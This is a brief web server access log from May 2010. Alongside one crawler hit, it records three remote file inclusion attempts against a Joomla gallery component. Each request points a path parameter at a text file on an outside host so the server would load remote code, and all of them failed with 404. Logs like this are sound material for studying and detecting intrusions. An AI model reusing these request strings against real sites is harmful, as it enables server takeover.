87.250.255.243 - - [08/May/2010:06:11:10 -0500] "GET /logs/access_log.1221436800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
209.62.121.162 - - [08/May/2010:06:13:40 -0500] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
209.62.121.162 - - [08/May/2010:06:13:40 -0500] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
209.62.121.162 - - [08/May/2010:06:13:40 -0500] "GET /logs/access_log.1270598400%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig.absolute.path=http://www.dvhrunners.co.kr//bbs//data/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
